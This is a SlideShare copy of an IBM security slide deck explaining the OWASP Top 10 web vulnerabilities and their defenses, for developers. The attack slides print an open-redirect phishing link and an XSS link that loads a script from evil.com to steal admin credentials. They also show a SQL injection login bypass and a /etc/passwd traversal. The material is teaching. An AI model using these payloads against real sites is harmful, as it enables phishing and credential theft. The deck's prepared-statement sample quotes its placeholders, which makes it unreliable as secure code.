SlideShare a Scribd company logo
1 of 29
© 2012 IBM Corporation
IBM Security Systems
1© 2015 IBM Corporation
Avoiding Application Attacks:
A Guide to Preventing the OWASP Top 10
from Happening to You
Paul Ionescu
Ethical Hacking Team
IBM Security Systems
2
Security Systems - Ethical Hacking Team
Applications an Essential Component of Today’s Technology
• Development moving more and more towards Web Applications
• Mobile Applications connecting to a public REST application
• Internet of Things with devices such as refrigerators and light switches connecting to
Public Web Applications
3
Security Systems - Ethical Hacking Team
The Application Layer Is Fully Exposed
• Companies cannot block access to their public applications
• Data is coming from the attacker’s laptop and going directly to the database
4
Security Systems - Ethical Hacking Team
Application Attacks and Security Incidents - 2014
• Attacks on Web Applications - the majority of disclosed attack types in 2014
• SQL Injection 2nd most common attack behind DDoS
• Data from X-Force Interactive Security Incidents web site:
http://www-03.ibm.com/security/xforce/xfisi/
5
Security Systems - Ethical Hacking Team
OWASP Top 10

OWASP is the Open Web Application Security Project and its mission is to enable
developers to write secure code

OWASP maintains a top of the most common categories of Web Application
Vulnerabilities
5
6
Security Systems - Ethical Hacking Team
10. Unvalidated Redirects and Forwards
Cybercriminals use trusted links to redirect to malicious resources.
• Imagine that the attacker got the admin contact from the Whois record and is looking to
gain access through a spear phishing attack.
• The attacker sends an e-mail to the victim containing a link to the company server
prompting them for action.
• The link is legit and the victim clicks it. Example:
• This is an automated notification from your web server. The web site is down. See error
log at this link: http://altoro.mybluemix.net/cgi-bin/index.cgi?http://evil.com/drive.html
• The link redirects the victim to a malicious site which leverages a vulnerability in the
browser installing a Trojan.
6
7
Security Systems - Ethical Hacking Team
9. Using Components with Known Vulnerabilities
• Vulnerabilities in third party components are used to take over unpatched systems
• Such vulnerabilities can be any of the issues presented in this session
• Two notable vulnerabilities popularized through mass media in 2014 were Heartbleed
and Shellshock
• Heartbleed is a Buffer Overflow type of issue in Open SSL
• Shellshock is a Shell Command Injection attack in Bash (the Linux Born Again Shell)
7
8
Security Systems - Ethical Hacking Team
8. Cross Site Request Forgery (CSRF)
• Attacker can invoke “blind” actions on web applications, impersonating as a trusted use
• Let's say that Steven Speed has an account with the fictitious bank Altoro Mutual and is
in dire need of some cash
• He observes how the transfer funds page works and creates an attack page that
executes a transfer from other users of the bank into his account
• Obviously the attacker will make this page look innocuous-- perhaps a page with
pictures of cats
• Then the attacker plants a link to this page on a social networking site, luring his victims
with the promise of cute kitty cat pictures
8
9
Security Systems - Ethical Hacking Team
7. Missing Function Level Access Control
• Attackers abuse the application to elevate their privileges either because access control
is defective or because is missing
• As a limited user, I log in to my bank account and change the URL to access the
administration page. If authorization is not properly employed I am now an administrator
of the site
9
10
Security Systems - Ethical Hacking Team
6. Sensitive Data Exposure
• What is it?
•Confidential data may be stolen due to incorrect data encryption
• What are the implications?
•Incorrect handling of security protocols allows data to be stolen in transit
•Database can be stolen
•Passwords can be stolen from configuration files
• So let's say that the attacker got Shell Access using ShellShock
• Now the attacker needs root access. Next thing the attacker will do is go hunt for
passwords in clear text
10
11
Security Systems - Ethical Hacking Team
5. Security Misconfiguration
• Improper server or web application configuration allows attackers to take over
• For example, the Tomcat Manager page may be enabled on the server
• If we are able to get access to this page we can certainly own the server and upload
malware to it
11
12
Security Systems - Ethical Hacking Team
4. Insecure Direct Object References
• Attackers can access sensitive files and resources because the application allows the
user to specify which files/resources are to be loaded
• For example imagine that you need to load static html content into a dynamic context
• Easiest thing to do is to allow the user to specify the html file name through content
parameter value. That makes it easy to use in the future, say if we needed to add more
html content, right? Wrong!
• Attackers can manipulate the value of the content parameter to access other files (let's
say: /etc/passwd)
12
13
Security Systems - Ethical Hacking Team
3. Cross-Site Scripting (XSS)
• Attackers embed malicious scripts into legitimate site changing the website's
functionality
• Let's say we wanted to get the admin's credentials. We could send them an 'alert e-mail'
from the site saying the site is down
• The link contains a malicious JS include which will alter the site's functionality to obtain
the admin's credentials
“This is an automated notification from your web server. The web site is down. See error
log at this link: http://altoro.mybluemix.net:8080/altoro/search.jsp?query=%3Cscript+src
%3D%22http%3A%2F%2Fevil.com%2Fxss.js%22%3E%3C%2Fscript%3E”
13
14
Security Systems - Ethical Hacking Team
2. Broken Authentication and Session Management
• What is it?
• Session management assets like user credentials and session IDs not
properly protected
• What are the implications?
• User authentication credentials aren’t protected when stored using hashing
or encryption
• Credentials can be guessed or overwritten through weak account
management functions (e.g., account creation, change password, recover
password, weak session IDs)
• Session IDs are exposed in the URL (e.g., URL rewriting)
• Session IDs are vulnerable to session fixation attacks
• Session IDs don’t timeout, or user sessions or authentication tokens,
particularly single sign-on (SSO) tokens, aren’t properly invalidated during
logout.
• Session IDs aren’t rotated after successful login.
• Passwords, session IDs, and other credentials are sent over unencrypted
connections.
14
15
Security Systems - Ethical Hacking Team
1. Injection
• User-supplied data is sent to an interpreter as part of a command, query or data
• What are the common implications?
• SQL Injection – Access/modify data in DB
• Command Injection – Execute OS Commands
• LDAP Injection – Bypass authentication with LDAP server
• etc...
• One very common exploit scenario is bypassing user authentication on the login page by
manipulating the SQL query
select * from users where userName='admin'---' and password='pass';
15
16
Security Systems - Ethical Hacking Team
Defending Against OWASP Top 10 Attacks
• Building security software defenses early into the SDLC can amount to millions of
dollars saved by avoiding security breaches
• NIST study on the cost of fixing software defects $100 invested in the design phase
amount to $3000 savings post release
• A 2014 report by the Ponemon Institute found that the average total cost of a data
breach for the companies participating in its research increased 15 percent to $3.5
million (http://www-935.ibm.com/services/us/en/it-
services/security-services/cost-of-data-breach/)
• Those architects who spend the extra $100 to improve their application security are
the unsung heroes. Without anyone’s knowledge, they have potentially saved their
organization millions of dollars
16
17
Security Systems - Ethical Hacking Team
Threat Modeling and Secure Coding
• Threat Modeling allows developers to design software defenses before the code is
written
• Where available, software defenses should be employed as a default mechanism or
part of a framework (e.g. parameterized statements in a database framework)
• Secure Coding checklists should be used when developing new code
• Secure Coding practices verified through code review
18
Security Systems - Ethical Hacking Team
Input Validation
• Can address OWASP attack categories of injection, cross-site scripting, insecure direct
object reference and invalidated redirects and forwards
• Basic tenet of software programming. Very simple, low-cost technique. If the input is
supposed to be a numeric value, make sure the string is only composed of characters 0–9
• This countermeasure can be applied in a framework
19
Security Systems - Ethical Hacking Team
Parameterized Command Calls
• Can address OWASP attack category of injection
• If you must allow values coming from the user to contain characters that could construct
shell or SQL commands, using the parameterized command calls is a simple way to
prevent them from executing. The following is an example:
java.sql.PreparedStatement stmt = connection.prepareStatement(“select * from
users where username=‘?’ and pass = ‘?'”);
stmt.setString(1,username);
stmt.setString(2,pass);
stmt.executeQuery();
20
Security Systems - Ethical Hacking Team
Output Encoding
• Can address OWASP attack category of Cross-Site Scripting
• If you must allow values coming from the user to contain HTML-type markup or JavaScript,
consider encoding these values when reflecting them back into the page
• For example, HTML encoding ensures HTML markup characters provided by the user do
not alter the content of the page
21
Security Systems - Ethical Hacking Team
Request Token Checks
• Can address OWASP attack categories of cross-site request forgery, reflected cross-site
scripting, broken authentication and session management
• This countermeasure prevents many types of client-side attacks. It makes HTTP requests
to the application expire, independent of cookies preventing attackers from storing such
requests in malicious sites or emails
• For example, the request below cannot be stored in an external site so long as the value of
the CSRF token expires:
POST https://mysite/transferMoney HTTP/1.1
CsrfToken: 534b44a19bf18d20b71ecc4eb77c572f
Cookie: JSESSIONID = c3625d6826a0e46cf6c51b7499bc63c8;
22
Security Systems - Ethical Hacking Team
Encryption
• Can address OWASP attack categories of sensitive data exposure, broken authentication
and session management
• If you must allow values coming from the user to contain HTML-type markup or JavaScript,
consider encoding these values when reflecting them back into the page
• For example, HTML encoding ensures HTML markup characters provided by the user do
not alter the content of the page
• When data is in transit between the client and the Web application, or between the
application and some other third party, it should be encrypted by using a secure
communication protocol. This prevents attackers from listening in on the wire.
• When the data at rest is stored in a database or a configuration file, it should also be
encrypted or hashed. This thwarts attackers who try to break in from escalating privileges or
gaining access to sensitive information.
23
Security Systems - Ethical Hacking Team
Testing Software Defenses using Application Scanners
• As you can imagine there are many combinations and variants of these attacks
• You can use an automated vulnerability scanner such as IBM Security AppScan to help
you find these issues in your applications
• Security scans can also be configured so they occur along with other QA automation
23
24
Security Systems - Ethical Hacking Team
IBM Security AppScan Standard
24
25
Security Systems - Ethical Hacking Team
Testing Security Coding Practices using Static Analysis
• You can validate that the code being written follows secure coding practices using code
scanners such as AppScan Source
• Scans can also be configured so they occur along with other build automation
25
26
Security Systems - Ethical Hacking Team
IBM Security AppScan Source
26
27
Security Systems - Ethical Hacking Team
Managing an Application Security Program
• Organizations with many software projects need a centralized collaboration tool for
monitoring and managing of secure engineering activities, such as AppScan Enterprise
27
Threat Modeling
& Secure Coding
Education and
Awareness
Security
Incident Response
Security Testing
Inventory
assets
Assess business
impact
Measure
status & progress
Prioritize
vulnerabilities
Determine
compliance
Application Security Program
28
Security Systems - Ethical Hacking Team
Q&A
© 2012 IBM Corporation
IBM Security Systems
29© 2015 IBM Corporation
THANK YOU!
@IBMSecurity
@pauliones
#hackingdemos

More Related Content

What's hot

Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...Security Innovation
 
How to Test for The OWASP Top Ten
 How to Test for The OWASP Top Ten How to Test for The OWASP Top Ten
How to Test for The OWASP Top TenSecurity Innovation
 
Owasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOwasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOWASP Delhi
 
Owasp top 10 security threats
Owasp top 10 security threatsOwasp top 10 security threats
Owasp top 10 security threatsVishal Kumar
 
OWASP Top 10 - 2017 Top 10 web application security risks
OWASP Top 10 - 2017 Top 10 web application security risksOWASP Top 10 - 2017 Top 10 web application security risks
OWASP Top 10 - 2017 Top 10 web application security risksKun-Da Wu
 
Security Testing
Security TestingSecurity Testing
Security TestingISsoft
 
Security risks awareness
Security risks awarenessSecurity risks awareness
Security risks awarenessJanagi Kannan
 
OWASP Top 10 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 - The Ten Most Critical Web Application Security RisksOWASP Top 10 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 - The Ten Most Critical Web Application Security RisksAll Things Open
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Brian Huff
 
OWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security RisksOWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security RisksAndre Van Klaveren
 
Secure code practices
Secure code practicesSecure code practices
Secure code practicesHina Rawal
 
Top 10 Web Application vulnerabilities
Top 10 Web Application vulnerabilitiesTop 10 Web Application vulnerabilities
Top 10 Web Application vulnerabilitiesTerrance Medina
 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Moataz Kamel
 
OWASP Top 10 Proactive Controls
OWASP Top 10 Proactive ControlsOWASP Top 10 Proactive Controls
OWASP Top 10 Proactive ControlsKaty Anton
 
Penetration Testing Basics
Penetration Testing BasicsPenetration Testing Basics
Penetration Testing BasicsRick Wanner
 

What's hot (20)

Owasp top 10 2017
Owasp top 10 2017Owasp top 10 2017
Owasp top 10 2017
 
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...
 
How to Test for The OWASP Top Ten
 How to Test for The OWASP Top Ten How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten
 
Owasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOwasp top 10 vulnerabilities
Owasp top 10 vulnerabilities
 
Owasp top 10 security threats
Owasp top 10 security threatsOwasp top 10 security threats
Owasp top 10 security threats
 
OWASP Top 10 - 2017 Top 10 web application security risks
OWASP Top 10 - 2017 Top 10 web application security risksOWASP Top 10 - 2017 Top 10 web application security risks
OWASP Top 10 - 2017 Top 10 web application security risks
 
Security Testing
Security TestingSecurity Testing
Security Testing
 
Security testing
Security testingSecurity testing
Security testing
 
Web Application Security 101
Web Application Security 101Web Application Security 101
Web Application Security 101
 
Security risks awareness
Security risks awarenessSecurity risks awareness
Security risks awareness
 
OWASP Top 10 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 - The Ten Most Critical Web Application Security RisksOWASP Top 10 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 - The Ten Most Critical Web Application Security Risks
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)
 
OWASP Top 10 Project
OWASP Top 10 ProjectOWASP Top 10 Project
OWASP Top 10 Project
 
OWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security RisksOWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security Risks
 
Secure code practices
Secure code practicesSecure code practices
Secure code practices
 
Top 10 Web Application vulnerabilities
Top 10 Web Application vulnerabilitiesTop 10 Web Application vulnerabilities
Top 10 Web Application vulnerabilities
 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020
 
Api security-testing
Api security-testingApi security-testing
Api security-testing
 
OWASP Top 10 Proactive Controls
OWASP Top 10 Proactive ControlsOWASP Top 10 Proactive Controls
OWASP Top 10 Proactive Controls
 
Penetration Testing Basics
Penetration Testing BasicsPenetration Testing Basics
Penetration Testing Basics
 

Viewers also liked

Exploitation of Injection and XSS
Exploitation of Injection and XSSExploitation of Injection and XSS
Exploitation of Injection and XSSKim Carter
 
Owasp top 10 web application security hazards part 2
Owasp top 10 web application security hazards part 2Owasp top 10 web application security hazards part 2
Owasp top 10 web application security hazards part 2Abhinav Sejpal
 
The OWASP Top 10 Most Critical Web App Security Risks - TdT@Cluj #20
The OWASP Top 10 Most Critical Web App Security Risks - TdT@Cluj #20The OWASP Top 10 Most Critical Web App Security Risks - TdT@Cluj #20
The OWASP Top 10 Most Critical Web App Security Risks - TdT@Cluj #20Tabăra de Testare
 
Owasp top 10 web application security hazards - Part 1
Owasp top 10 web application security hazards - Part 1Owasp top 10 web application security hazards - Part 1
Owasp top 10 web application security hazards - Part 1Abhinav Sejpal
 
Presentation on Top 10 Vulnerabilities in Web Application
Presentation on Top 10 Vulnerabilities in Web ApplicationPresentation on Top 10 Vulnerabilities in Web Application
Presentation on Top 10 Vulnerabilities in Web ApplicationMd Mahfuzur Rahman
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesCarol McDonald
 
OWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root CausesOWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root CausesMarco Morana
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10bilcorry
 
OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesSoftware Guru
 
Owasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesOwasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesMarco Morana
 

Viewers also liked (10)

Exploitation of Injection and XSS
Exploitation of Injection and XSSExploitation of Injection and XSS
Exploitation of Injection and XSS
 
Owasp top 10 web application security hazards part 2
Owasp top 10 web application security hazards part 2Owasp top 10 web application security hazards part 2
Owasp top 10 web application security hazards part 2
 
The OWASP Top 10 Most Critical Web App Security Risks - TdT@Cluj #20
The OWASP Top 10 Most Critical Web App Security Risks - TdT@Cluj #20The OWASP Top 10 Most Critical Web App Security Risks - TdT@Cluj #20
The OWASP Top 10 Most Critical Web App Security Risks - TdT@Cluj #20
 
Owasp top 10 web application security hazards - Part 1
Owasp top 10 web application security hazards - Part 1Owasp top 10 web application security hazards - Part 1
Owasp top 10 web application security hazards - Part 1
 
Presentation on Top 10 Vulnerabilities in Web Application
Presentation on Top 10 Vulnerabilities in Web ApplicationPresentation on Top 10 Vulnerabilities in Web Application
Presentation on Top 10 Vulnerabilities in Web Application
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security Vulnerabilities
 
OWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root CausesOWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root Causes
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10
 
OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application Vulnerabilities
 
Owasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesOwasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root Causes
 

Similar to Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Happening to You

Secure coding guidelines
Secure coding guidelinesSecure coding guidelines
Secure coding guidelinesZakaria SMAHI
 
Web and Mobile Application Security
Web and Mobile Application SecurityWeb and Mobile Application Security
Web and Mobile Application SecurityPrateek Jain
 
Solvay secure application layer v2015 seba
Solvay secure application layer v2015   sebaSolvay secure application layer v2015   seba
Solvay secure application layer v2015 sebaSebastien Deleersnyder
 
An Introduction of SQL Injection, Buffer Overflow & Wireless Attack
An Introduction of SQL Injection, Buffer Overflow & Wireless AttackAn Introduction of SQL Injection, Buffer Overflow & Wireless Attack
An Introduction of SQL Injection, Buffer Overflow & Wireless AttackTechSecIT
 
Common Web Application Attacks
Common Web Application Attacks Common Web Application Attacks
Common Web Application Attacks Ahmed Sherif
 
Jonathan Singer - Wheezing The Juice.pdf
Jonathan Singer - Wheezing The Juice.pdfJonathan Singer - Wheezing The Juice.pdf
Jonathan Singer - Wheezing The Juice.pdfJonathan Singer
 
Top 20 certified ethical hacker interview questions and answer
Top 20 certified ethical hacker interview questions and answerTop 20 certified ethical hacker interview questions and answer
Top 20 certified ethical hacker interview questions and answerShivamSharma909
 
Network security, seriously?
Network security, seriously?Network security, seriously?
Network security, seriously?Peter Wood
 
DBMS Vulnerabilities And Threats.pptx
DBMS Vulnerabilities And Threats.pptxDBMS Vulnerabilities And Threats.pptx
DBMS Vulnerabilities And Threats.pptxsiti829412
 
Exploitation techniques and fuzzing
Exploitation techniques and fuzzingExploitation techniques and fuzzing
Exploitation techniques and fuzzingG Prachi
 
Domain 5 of the CEH Web Application Hacking.pptx
Domain 5 of the CEH Web Application Hacking.pptxDomain 5 of the CEH Web Application Hacking.pptx
Domain 5 of the CEH Web Application Hacking.pptxInfosectrain3
 
How Does a Data Breach Happen?
How Does a Data Breach Happen? How Does a Data Breach Happen?
How Does a Data Breach Happen? Claranet UK
 
Injection techniques conversys
Injection techniques conversysInjection techniques conversys
Injection techniques conversysKrishnendu Paul
 
Uncover What's Inside the Mind of a Hacker
Uncover What's Inside the Mind of a HackerUncover What's Inside the Mind of a Hacker
Uncover What's Inside the Mind of a HackerIBM Security
 
Web application vulnerability assessment
Web application vulnerability assessmentWeb application vulnerability assessment
Web application vulnerability assessmentRavikumar Paghdal
 
Top 10 web application security risks akash mahajan
Top 10 web application security risks   akash mahajanTop 10 web application security risks   akash mahajan
Top 10 web application security risks akash mahajanAkash Mahajan
 
Domain 5 of the CEH: Web Application Hacking
Domain 5 of the CEH: Web Application HackingDomain 5 of the CEH: Web Application Hacking
Domain 5 of the CEH: Web Application HackingShivamSharma909
 
Using Analyzers to Resolve Security Problems
Using Analyzers to Resolve Security ProblemsUsing Analyzers to Resolve Security Problems
Using Analyzers to Resolve Security Problemskiansahafi
 

Similar to Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Happening to You (20)

Secure coding guidelines
Secure coding guidelinesSecure coding guidelines
Secure coding guidelines
 
Web and Mobile Application Security
Web and Mobile Application SecurityWeb and Mobile Application Security
Web and Mobile Application Security
 
Solvay secure application layer v2015 seba
Solvay secure application layer v2015   sebaSolvay secure application layer v2015   seba
Solvay secure application layer v2015 seba
 
An Introduction of SQL Injection, Buffer Overflow & Wireless Attack
An Introduction of SQL Injection, Buffer Overflow & Wireless AttackAn Introduction of SQL Injection, Buffer Overflow & Wireless Attack
An Introduction of SQL Injection, Buffer Overflow & Wireless Attack
 
Common Web Application Attacks
Common Web Application Attacks Common Web Application Attacks
Common Web Application Attacks
 
Jonathan Singer - Wheezing The Juice.pdf
Jonathan Singer - Wheezing The Juice.pdfJonathan Singer - Wheezing The Juice.pdf
Jonathan Singer - Wheezing The Juice.pdf
 
Top 20 certified ethical hacker interview questions and answer
Top 20 certified ethical hacker interview questions and answerTop 20 certified ethical hacker interview questions and answer
Top 20 certified ethical hacker interview questions and answer
 
Network security, seriously?
Network security, seriously?Network security, seriously?
Network security, seriously?
 
DBMS Vulnerabilities And Threats.pptx
DBMS Vulnerabilities And Threats.pptxDBMS Vulnerabilities And Threats.pptx
DBMS Vulnerabilities And Threats.pptx
 
Exploitation techniques and fuzzing
Exploitation techniques and fuzzingExploitation techniques and fuzzing
Exploitation techniques and fuzzing
 
Domain 5 of the CEH Web Application Hacking.pptx
Domain 5 of the CEH Web Application Hacking.pptxDomain 5 of the CEH Web Application Hacking.pptx
Domain 5 of the CEH Web Application Hacking.pptx
 
How Does a Data Breach Happen?
How Does a Data Breach Happen? How Does a Data Breach Happen?
How Does a Data Breach Happen?
 
Injection techniques conversys
Injection techniques conversysInjection techniques conversys
Injection techniques conversys
 
Lets Make our Web Applications Secure
Lets Make our Web Applications SecureLets Make our Web Applications Secure
Lets Make our Web Applications Secure
 
Uncover What's Inside the Mind of a Hacker
Uncover What's Inside the Mind of a HackerUncover What's Inside the Mind of a Hacker
Uncover What's Inside the Mind of a Hacker
 
Web application vulnerability assessment
Web application vulnerability assessmentWeb application vulnerability assessment
Web application vulnerability assessment
 
Top 10 web application security risks akash mahajan
Top 10 web application security risks   akash mahajanTop 10 web application security risks   akash mahajan
Top 10 web application security risks akash mahajan
 
CEH Domain 5.pdf
CEH Domain 5.pdfCEH Domain 5.pdf
CEH Domain 5.pdf
 
Domain 5 of the CEH: Web Application Hacking
Domain 5 of the CEH: Web Application HackingDomain 5 of the CEH: Web Application Hacking
Domain 5 of the CEH: Web Application Hacking
 
Using Analyzers to Resolve Security Problems
Using Analyzers to Resolve Security ProblemsUsing Analyzers to Resolve Security Problems
Using Analyzers to Resolve Security Problems
 

More from IBM Security

Automation: Embracing the Future of SecOps
Automation: Embracing the Future of SecOpsAutomation: Embracing the Future of SecOps
Automation: Embracing the Future of SecOpsIBM Security
 
Leaders & Laggards: The Latest Findings from the Ponemon Institute’s Study on...
Leaders & Laggards: The Latest Findings from the Ponemon Institute’s Study on...Leaders & Laggards: The Latest Findings from the Ponemon Institute’s Study on...
Leaders & Laggards: The Latest Findings from the Ponemon Institute’s Study on...IBM Security
 
Bridging the Gap between Privacy and Security: Using Technology to Manage Com...
Bridging the Gap between Privacy and Security: Using Technology to Manage Com...Bridging the Gap between Privacy and Security: Using Technology to Manage Com...
Bridging the Gap between Privacy and Security: Using Technology to Manage Com...IBM Security
 
Integrated Response with v32 of IBM Resilient
Integrated Response with v32 of IBM ResilientIntegrated Response with v32 of IBM Resilient
Integrated Response with v32 of IBM ResilientIBM Security
 
The Resilient End-of-Year Review: The Top Cyber Security Trends in 2018 and P...
The Resilient End-of-Year Review: The Top Cyber Security Trends in 2018 and P...The Resilient End-of-Year Review: The Top Cyber Security Trends in 2018 and P...
The Resilient End-of-Year Review: The Top Cyber Security Trends in 2018 and P...IBM Security
 
Leveraging Validated and Community Apps to Build a Versatile and Orchestrated...
Leveraging Validated and Community Apps to Build a Versatile and Orchestrated...Leveraging Validated and Community Apps to Build a Versatile and Orchestrated...
Leveraging Validated and Community Apps to Build a Versatile and Orchestrated...IBM Security
 
Accelerating SOC Transformation with IBM Resilient and Carbon Black
Accelerating SOC Transformation with IBM Resilient and Carbon BlackAccelerating SOC Transformation with IBM Resilient and Carbon Black
Accelerating SOC Transformation with IBM Resilient and Carbon BlackIBM Security
 
How to Build a Faster, Laser-Sharp SOC with Intelligent Orchestration
How to Build a Faster, Laser-Sharp SOC with Intelligent OrchestrationHow to Build a Faster, Laser-Sharp SOC with Intelligent Orchestration
How to Build a Faster, Laser-Sharp SOC with Intelligent OrchestrationIBM Security
 
Are You Ready to Move Your IAM to the Cloud?
Are You Ready to Move Your IAM to the Cloud?Are You Ready to Move Your IAM to the Cloud?
Are You Ready to Move Your IAM to the Cloud?IBM Security
 
Orchestrate Your Security Defenses to Optimize the Impact of Threat Intelligence
Orchestrate Your Security Defenses to Optimize the Impact of Threat IntelligenceOrchestrate Your Security Defenses to Optimize the Impact of Threat Intelligence
Orchestrate Your Security Defenses to Optimize the Impact of Threat IntelligenceIBM Security
 
Your Mainframe Environment is a Treasure Trove: Is Your Sensitive Data Protec...
Your Mainframe Environment is a Treasure Trove: Is Your Sensitive Data Protec...Your Mainframe Environment is a Treasure Trove: Is Your Sensitive Data Protec...
Your Mainframe Environment is a Treasure Trove: Is Your Sensitive Data Protec...IBM Security
 
Meet the New IBM i2 QRadar Offense Investigator App and Start Threat Hunting ...
Meet the New IBM i2 QRadar Offense Investigator App and Start Threat Hunting ...Meet the New IBM i2 QRadar Offense Investigator App and Start Threat Hunting ...
Meet the New IBM i2 QRadar Offense Investigator App and Start Threat Hunting ...IBM Security
 
Understanding the Impact of Today's Security Breaches: The 2017 Ponemon Cost ...
Understanding the Impact of Today's Security Breaches: The 2017 Ponemon Cost ...Understanding the Impact of Today's Security Breaches: The 2017 Ponemon Cost ...
Understanding the Impact of Today's Security Breaches: The 2017 Ponemon Cost ...IBM Security
 
WannaCry Ransomware Attack: What to Do Now
WannaCry Ransomware Attack: What to Do NowWannaCry Ransomware Attack: What to Do Now
WannaCry Ransomware Attack: What to Do NowIBM Security
 
How to Improve Threat Detection & Simplify Security Operations
How to Improve Threat Detection & Simplify Security OperationsHow to Improve Threat Detection & Simplify Security Operations
How to Improve Threat Detection & Simplify Security OperationsIBM Security
 
Mobile Vision 2020
Mobile Vision 2020Mobile Vision 2020
Mobile Vision 2020IBM Security
 
Retail Mobility, Productivity and Security
Retail Mobility, Productivity and SecurityRetail Mobility, Productivity and Security
Retail Mobility, Productivity and SecurityIBM Security
 
Close the Loop on Incident Response
Close the Loop on Incident ResponseClose the Loop on Incident Response
Close the Loop on Incident ResponseIBM Security
 
Orchestrate Your Security Defenses; Protect Against Insider Threats
Orchestrate Your Security Defenses; Protect Against Insider Threats Orchestrate Your Security Defenses; Protect Against Insider Threats
Orchestrate Your Security Defenses; Protect Against Insider Threats IBM Security
 

More from IBM Security (20)

Automation: Embracing the Future of SecOps
Automation: Embracing the Future of SecOpsAutomation: Embracing the Future of SecOps
Automation: Embracing the Future of SecOps
 
Leaders & Laggards: The Latest Findings from the Ponemon Institute’s Study on...
Leaders & Laggards: The Latest Findings from the Ponemon Institute’s Study on...Leaders & Laggards: The Latest Findings from the Ponemon Institute’s Study on...
Leaders & Laggards: The Latest Findings from the Ponemon Institute’s Study on...
 
Bridging the Gap between Privacy and Security: Using Technology to Manage Com...
Bridging the Gap between Privacy and Security: Using Technology to Manage Com...Bridging the Gap between Privacy and Security: Using Technology to Manage Com...
Bridging the Gap between Privacy and Security: Using Technology to Manage Com...
 
Integrated Response with v32 of IBM Resilient
Integrated Response with v32 of IBM ResilientIntegrated Response with v32 of IBM Resilient
Integrated Response with v32 of IBM Resilient
 
The Resilient End-of-Year Review: The Top Cyber Security Trends in 2018 and P...
The Resilient End-of-Year Review: The Top Cyber Security Trends in 2018 and P...The Resilient End-of-Year Review: The Top Cyber Security Trends in 2018 and P...
The Resilient End-of-Year Review: The Top Cyber Security Trends in 2018 and P...
 
Leveraging Validated and Community Apps to Build a Versatile and Orchestrated...
Leveraging Validated and Community Apps to Build a Versatile and Orchestrated...Leveraging Validated and Community Apps to Build a Versatile and Orchestrated...
Leveraging Validated and Community Apps to Build a Versatile and Orchestrated...
 
Accelerating SOC Transformation with IBM Resilient and Carbon Black
Accelerating SOC Transformation with IBM Resilient and Carbon BlackAccelerating SOC Transformation with IBM Resilient and Carbon Black
Accelerating SOC Transformation with IBM Resilient and Carbon Black
 
How to Build a Faster, Laser-Sharp SOC with Intelligent Orchestration
How to Build a Faster, Laser-Sharp SOC with Intelligent OrchestrationHow to Build a Faster, Laser-Sharp SOC with Intelligent Orchestration
How to Build a Faster, Laser-Sharp SOC with Intelligent Orchestration
 
Are You Ready to Move Your IAM to the Cloud?
Are You Ready to Move Your IAM to the Cloud?Are You Ready to Move Your IAM to the Cloud?
Are You Ready to Move Your IAM to the Cloud?
 
Orchestrate Your Security Defenses to Optimize the Impact of Threat Intelligence
